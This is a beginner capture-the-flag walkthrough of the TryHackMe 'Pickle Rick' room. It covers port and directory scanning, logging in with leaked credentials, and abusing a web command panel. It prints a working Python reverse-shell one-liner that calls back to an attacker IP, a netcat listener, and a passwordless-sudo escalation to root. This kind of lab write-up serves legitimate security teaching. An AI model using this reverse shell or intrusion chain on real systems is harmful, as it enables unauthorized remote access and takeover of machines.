TryHackMe : Pickle Rick Writeup

In this article I will be sharing a writeup for Pickle Rick, which is a free room available on TryHackMe. This is a beginner level machine and the goal is to get all 3 ingredients to help rick.

TryHackMe : Pickle Rick Writeup

Challenge Link : https://tryhackme.com/room/picklerick

Initial Enumeration

I started the initial reconnaissance by running a port scan using nmap looking for open ports and services.

madhav@anton:~/ctf/thm/pickleRick▸ nmap -sC -sV -oN nmap/initial 10.10.135.192
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-29 11:48 IST
Nmap scan report for 10.10.135.192
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:42:94:66:68:4a:cb:05:31:65:b0:ed:ef:2a:cf:c2 (RSA)
|   256 9a:63:68:b2:8c:d7:4a:34:8c:05:7e:c3:6f:50:61:96 (ECDSA)
|_  256 e7:10:dc:be:ab:af:da:67:c7:67:1d:6b:51:fd:9d:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.37 seconds

We have OpenSSH running on port 22 and Apache httpd running on port 80. Let's open our web browser to enumerate port 80.

I checked the source code of the page and found a username:

Next, I performed a gobuster scan to look for hidden files and directories.

madhav@anton:~/ctf/thm/pickleRick▸ gobuster dir -u http://10.10.135.192 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.135.192
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
2021/04/29 11:48:58 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882] 
/assets               (Status: 301) [Size: 315] [--> http://10.10.135.192/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]                                    
===============================================================
2021/04/29 14:06:34 Finished
===============================================================

There are many files here, I visited the portal.php but it redirected me to login.php. We have a username but we need a password to login. Next, I checked the robots.txt and found a string there.

This is what we were looking for, I used the following credentials to login into login.php R1ckRul3s:Wubbalubbadubdub.

User Shell

After logging in, we are redirected to portal.php which has a Command Panel and as the name suggests, we can execute any commands here.

I executed the which python3 command to check if we have netcat installed.

Yes we have python3 installed. Now we can use the following command to get a reverse shell on our system:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Before that, remember to start a netcat listener in your local machine using nc -lvnp 4444 and replace the IP address used here with your IP.

madhav@anton:~/ctf/thm/pickleRick▸ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.135.192 57652
www-data@ip-10-10-135-192:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, I upgraded the shell to a fully interactive TTY using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
reset
Ctrl+D
export TERM=xterm-256color
stty rows 42
stty columns 149

Next, I checked the /var/www/html directory and we have our first ingredient there:

www-data@ip-10-10-135-192:/var/www/html$ ls
Sup3rS3cretPickl3Ingred.txt  assets  clue.txt  denied.php  index.html  login.php  portal.php  robots.txt
www-data@ip-10-10-135-192:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt 
*** ******* ****

We have our first ingredient, we need two more to complete the challenge. Next I checked the /home directory. We have a user named rick and inside the home directory of user rick there was our second ingredient.

www-data@ip-10-10-135-192:/var/www/html$ cd /home/rick/
www-data@ip-10-10-135-192:/home/rick$ ls
second ingredients
www-data@ip-10-10-135-192:/home/rick$ cat second\ ingredients 
* ***** ****

Root Shell

I used the sudo -l command to see if we can run any command as root.

www-data@ip-10-10-135-192:/home/rick$ sudo -l
Matching Defaults entries for www-data on ip-10-10-135-192.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-135-192.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

User www-data can run any command as root. We can get root shell by using sudo su. This was so easy! Once we are root, we can read our third ingredient present in the root directory.

www-data@ip-10-10-135-192:/home/rick$ sudo su
root@ip-10-10-135-192:/home/rick# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-10-135-192:/home/rick# cd /root/
root@ip-10-10-135-192:~# cat 3rd.txt 
3rd ingredients: ***** *****

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Meagan.